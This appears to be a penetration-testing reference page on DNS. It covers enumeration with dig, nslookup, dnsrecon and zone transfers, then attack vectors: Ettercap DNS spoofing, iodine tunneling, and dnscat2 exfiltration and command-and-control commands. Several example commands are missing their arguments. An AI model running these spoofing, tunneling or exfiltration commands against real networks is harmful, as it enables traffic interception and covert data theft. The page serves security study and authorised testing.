Skip to main content

Domain Name System (DNS)

Default Port: 53

DNS (Domain Name System) functions as the internet's phonebook, converting user-friendly domain names like into numerical IP addresses, enabling swift access to online resources. DNS is a hierarchical and decentralized naming system for computers, services, or any resource connected to the Internet or a private network. It translates human-readable domain names to numerical IP addresses, essential for locating and identifying computer services and devices within network protocols.

DNS operates on a client-server model, with the resolver sending requests to DNS servers, which then respond with the requested information.

DNS operates primarily on port 53 and is facilitated by various types of servers:

  • Root Servers: These manage the highest level of the DNS hierarchy and oversee top-level domains globally, stepping in if lower-level servers fail to respond. ICANN supervises these 13 root servers.

  • Authoritative Nameservers: They hold the final authority for queries within their designated zones, providing definitive responses. If they cannot respond, queries are escalated to root servers.

  • Non-authoritative Nameservers: These servers lack domain ownership and acquire domain information through queries to other servers.

  • Caching DNS Servers: These servers store previous query answers for a specified duration, speeding up future responses. The cache duration is determined by the authoritative server.

  • Forwarding Servers: They simply forward queries to other servers.

  • Resolvers: Integrated into computers or routers, resolvers perform local name resolution without being authoritative.


Banner grabbing is used to identify DNS server versions. You can use the following commands:

# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @DNS

# Alternatively, use nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, use telnet to grab the banner
nc -nv -u <DNS_IP> 53

### DNS Server Discovery

Identifying the DNS servers associated with a target domain is a critical first step. Tools like dig and nslookup can be employed to find nameservers:

# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>



To automate subdomain discovery, you can use dnsenum or custom scripts:

dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>

Using dig

A command-line tool used to perform DNS queries and gather information about DNS servers.

# Query DNS records

# Query specific type of DNS records (e.g., A record)
dig A

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server

Using nslookup

For querying DNS servers for various records or performing reverse lookups:

# Perform DNS queries

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX

# Query a specific DNS server
nslookup <DNS_IP>

Using host

A tool used to perform DNS queries and determine IP addresses.

# Perform DNS query

# Query specific type of DNS records (e.g., MX record)
host -t MX

# Perform a reverse DNS lookup

Any Record Query

To retrieve all available entries from a DNS server, you can use the following command:

dig any @<DNS_IP>

Zone Transfer

AXFR query is a DNS protocol request used to retrieve all records of a domain from a DNS server. You can use the following commands:

# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, you can use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>

Metasploit Modules and Nmap Scripts

For utilizing Metasploit modules or Nmap scripts for enumeration:

use auxiliary/gather/enum_dns
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

DNS Reverse and Subdomain Brute Force

For conducting DNS reverse and subdomain brute force:

dnsrecon -r -n <IP_DNS>
dnsrecon -r -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>
dnsrecon -d active.htb -a -n <IP_DNS>

DNS Cache Snooping

DNS cache snooping is a technique used to query the DNS cache to gather information about past DNS records. This method can be used to access hidden or confidential information within a network.

# Querying the DNS cache
dnsrecon -t std -d -D /usr/share/dnsrecon/namelist.txt

DNS Enumeration with Google Dorks

DNS enumeration using Google Dorks involves collecting DNS information for a specific domain using advanced Google search operators. This method serves as a comprehensive information gathering technique for cybersecurity assessments.

# Collecting DNS information using Google Dorks

DNS Enumeration Using Maltego

Visualization tools like Maltego can be used to collect and visualize DNS information. This provides a more comprehensive analysis, representing relationships and connections within the target network visually.

# DNS mapping with Maltego

DNS Enumeration Using Online Tools

Various online DNS enumeration tools are available to gather and analyze DNS information. These tools typically perform extensive queries and present results conveniently.

  1. DNS Dumpster: - An online tool used to gather DNS information for a specific domain. It provides subdomains, MX records, NS records, and more.

  2. DNS Recon: - A comprehensive information gathering and penetration testing tool for domains. It includes subdomains, DNS records, reverse DNS queries, and more.

  3. Spyse: - A platform for extensive asset gathering. It includes DNS information, subdomains, SSL certificates, and more.

  4. SecurityTrails: - A platform for asset tracking. It includes DNS history, subdomains, IP addresses, and more.

  5. DNSlytics: - An online platform for researching and analyzing DNS information. It provides WHOIS data, DNS records, domain history, and more.

DNS Enumeration via Certificate Transparency Logs

Certificate Transparency logs monitor widely used SSL/TLS certificates for domain names and subdomains. These logs can be used to identify subdomains and services used by a target.

  1. DNS CertSpotter: Utilize online tools like to scan Certificate Transparency (CT) logs for a specific domain.

  2. Subdomain Enumeration: Examine SSL/TLS certificates listed in CT logs and identify subdomains associated with a particular target domain.

Attack Vectors

DNS Spoofing

DNS spoofing involves introducing corrupt Domain Name System data into a DNS resolver's cache, causing the name server to return an incorrect IP address, diverting traffic to the attacker's computer.

Poisoning with Ettercap

Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN. It can be used for DNS spoofing.

ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof

DNS Tunneling

DNS Tunneling leverages DNS queries and responses to encapsulate data of other programs or protocols in DNS queries and responses.

Setup with Iodine

Iodine lets you tunnel IPv4 data through a DNS server.

# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>


Cache Snooping

Cache snooping is a technique to determine if a DNS server has specific records in its cache.

dig @<dns-server> <domain> +norecurse

Reverse DNS Lookup

Reverse DNS lookup is a DNS query for the domain name associated with a given IP address.

dig -x <ip-address>

DNS Exfiltration

Data exfiltration over DNS involves encoding data in DNS queries and responses, allowing data to be extracted from a network covertly.

Exfiltration with dnscat2

dnscat2 is designed to create an encrypted command-and-control channel over the DNS.

# Server side
dnscat2 --dns server=<dns-server-ip>:53

# Client side
dnscat2 <domain>